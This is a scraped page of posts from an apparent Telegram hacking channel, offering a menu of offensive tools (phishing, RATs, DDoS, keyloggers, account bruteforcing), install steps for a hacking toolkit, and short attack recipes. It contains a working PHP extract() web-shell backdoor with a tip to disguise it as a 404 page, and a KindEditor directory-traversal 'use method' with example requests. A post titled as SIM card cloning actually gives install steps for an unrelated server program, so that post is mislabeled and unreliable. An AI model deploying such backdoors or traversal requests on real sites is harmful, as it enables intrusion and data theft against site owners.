UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Hackingtool Menu 🧰
Anonymously Hiding Tools
Information gathering tools
Wordlist Generator
Wireless attack tools
SQL Injection Tools
Phishing attack tools
Web Attack tools
Post exploitation tools
Forensic tools
Payload creation tools
Exploit framework
Reverse engineering tools
DDOS Attack Tools
Remote Administrator Tools (RAT)
XSS Attack Tools
Steganograhy tools
Other tools
SocialMedia Bruteforce
Android Hacking tools
IDN Homograph Attack
Email Verify tools
Hash cracking tools
Wifi Deauthenticate
SocialMedia Finder
Payload Injector
Web crawling
Mix tools
Anonymously Hiding Tools
Anonmously Surf
Multitor
Information gathering tools
Network Map (nmap)
Dracnmap
Port scanning
Host to IP
Xerosploit
RED HAWK (All In One Scanning)
ReconSpider(For All Scaning)
IsItDown (Check Website Down/Up)
Infoga - Email OSINT
ReconDog
Striker
SecretFinder (like API & etc)
Find Info Using Shodan
Port Scanner - rang3r
Breacher
Wordlist Generator
Cupp
WordlistCreator
Goblin WordGenerator
Password list (1.4 Billion Clear Text Password)
Wireless attack tools
WiFi-Pumpkin
pixiewps
Bluetooth Honeypot GUI Framework
Fluxion
Wifiphisher
Wifite
EvilTwin
Fastssh
Howmanypeople
SQL Injection Tools
Sqlmap tool
NoSqlMap
Damn Small SQLi Scanner
Explo
Blisqy - Exploit Time-based blind-SQL injection
Leviathan - Wide Range Mass Audit Toolkit
SQLScan
Phishing attack tools
Setoolkit
SocialFish
HiddenEye
Evilginx2
I-See_You(Get Location using phishing attack)
SayCheese (Grab target's Webcam Shots)
QR Code Jacking
ShellPhish
BlackPhish
Web Attack tools
Web2Attack
Skipfish
SubDomain Finder
CheckURL
Blazy(Also Find ClickJacking)
Sub-Domain TakeOver
Dirb
Post exploitation tools
Vegile - Ghost In The Shell
Chrome Keylogger
Forensic tools
Autopsy
Wireshark
Bulk extractor
Disk Clone and ISO Image Aquire
Toolsley
Payload creation tools
The FatRat
Brutal
Stitch
MSFvenom Payload Creator
Venom Shellcode Generator
Spycam
Mob-Droid
Enigma
Exploit framework
RouterSploit
WebSploit
Commix
Web2Attack
Reverse engineering tools
Androguard
Apk2Gold
JadX
DDOS Attack Tools
SlowLoris
Asyncrone | Multifunction SYN Flood DDoS Weapon
UFOnet
GoldenEye
Remote Administrator Tools (RAT)
Stitch
Pyshell
XSS Attack Tools
DalFox(Finder of XSS)
XSS Payload Generator
Extended XSS Searcher and Finder
XSS-Freak
XSpear
XSSCon
XanXSS
Advanced XSS Detection Suite
RVuln
Steganograhy tools
SteganoHide
StegnoCracker
Whitespace
Other tools
SocialMedia Bruteforce
Instagram Attack
AllinOne SocialMedia Attack
Facebook Attack
Application Checker
Android Hacking tools
Keydroid
MySMS
Lockphish (Grab target LOCK PIN)
DroidCam (Capture Image)
EvilApp (Hijack Session)
HatCloud(Bypass CloudFlare for IP)
IDN Homograph Attack
EvilURL
Email Verify tools
Knockmail
Hash cracking tools
Hash Buster
Wifi Deauthenticate
WifiJammer-NG
KawaiiDeauther
SocialMedia Finder
Find SocialMedia By Facial Recognation System
Find SocialMedia By UserName
Sherlock
SocialScan | Username or Email
Payload Injector
Debinject
Pixload
Web crawling
Gospider
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NEW UPDATE ALL IN ONE REAL HACKING

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/Z4nzu/hackingtool.git

2) chmod -R 755 hackingtool

3) cd hackingtool

4) sudo pip3 install -r requirement.txt

5) bash install.sh

6) sudo hackingtool

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ODOR1-PHP extract backdoor usage methode :)
let's introduce a new PHP backdoor: extract function backdoor.

codecode show as below:

1) extract
(PHP 4, PHP 5)
extract β€” import variables from the array to the current symbol table
int extract (array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]])
This function is used to The variables are imported from the array into the current symbol table.


2) Specific application:

1: PHP extract function in a variety of usage presentation
2: PHP extract () function
3: Official Document
4: php-backdoors-hidden- with-clever-use-of-extract-function
next surgeon launched :)

3) Server code:


<?@extract($_REQUEST);@die($err($info));?>

4) Finally, add various codes, tags and 404...you know (‡▽′)ψ


@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Analysis of the evolution of the transparent tribe hacker organization
Let's see the truth #Cyberattack #Analyse
Forwarded from UNDERCODE NEWS
Free photo site Freepik reports data leak involving 8.3 million users
#Leaks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A REAL FREE SIM CARD CLONING-OPEN SOURCE :)

R E Q U I R E M E N T S :

-gcc/g++ (with 32 bit support – for compiling submissions) with C++17 support (Debian package: g++-multilib)

-MariaDB (Debian package: mariadb-server)

-MariaDB client library (Debian packages: libmariadbclient-dev)

-libseccomp (Debian package: libseccomp-dev)

-GNU/Make (Debian package: make version >= 4.2.1)

-libzip (Debian package: libzip-dev)

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev

2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.

3) Arch Linux

> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \

> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \

> sudo systemctl enable mariadb && sudo systemctl start mariadb

πŸ¦‘Instructions
In case you installed MariaDB server for the first time, you should run:

1️⃣sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules

2️⃣git clone --recursive https://github.com/varqox/sim &&

3️⃣cd sim

4️⃣Build

5️⃣make -j $(nproc)

6️⃣Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty – if that does not work try running the below command with sudo):

> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p

7️⃣Install

8️⃣make install

9️⃣It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.

πŸ”ŸIf you want to install Sim in other location that build/ type

make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run

1️⃣1️⃣If you have not installed Sim in the default location use command:

make run DESTDIR=where-you-installed-Sim

1️⃣2️⃣You can combine building, installation and running commands into:

make all install run

1️⃣3️⃣Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim

1️⃣4️⃣Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!

Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.

1️⃣5️⃣If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):

@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build

ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
stored xxs in facebook.pdf
441.5 KB
The Open Graph protocol When you add a URL in a Facebook post, Facebook will use the Open Graph protocol (FB doc) to display rich content. Here is a summary about how Facebook uses OG to embed external content in a FB post:

1. The aacker posts a URL on a FB post

2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video file URL)

3. The vicm views the FB post with the cover image and a play buon

4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Disadvantages of Kali Linux

As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β€”

- It makes the system slower.

- The system can get easily corrupted.

-Some softwares may not be functioned well .

-KALI is not as easy to use because it’s penetration oriented.

-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources

-forget about universities all anonymous hackers don.t use kali

-In the process of using KALI for NORMAL, you may Trash some of KALI’s specialized settings for it’s own security.

wiki resoucesxd
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Break webcam-cctv like expert .pdf
2.4 MB
Now it could be that your CCTV, IP camera is simply exposed on the Internet and the attacker has found it on sites such as Shodan. You haven’t changed the default password and bam, they are in. Watching your every move.
Forwarded from UNDERCODE NEWS
Vulnerability in current simple IoT modules could expose a significant number of devices worldwide to security risks
#Vulnerabilities
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Kindeditor traverse directory 0DAY problem

KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.

> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.

πŸ¦‘Use method:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php


2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Speedup internet via DNS :


A) ROUTER

If you're using a router for your office network DNS settingsβ€”and you probably areβ€”log into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:

-For IPv4: 1.1.1.1 and 1.0.0.1
-For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.

B) WINDOWS
With Windows 10:

1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5)Double-click on the active network adapter.
6)Write down any existing DNS server entries for future reference.
7)Click Use The Following DNS Server Addresses.
8)Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
9) With Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:

10) Click on Network and Internet.

11) Click on Change Adapter Settings.
12) Right click on the Wi-Fi network you are connected to, then click Properties.

13) Select Internet Protocol Version 4 (or Version 6 if desired).
14) Click Properties.

15) Write down any existing DNS server entries for future reference.

16) Click Use The Following DNS Server Addresses.

17) Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁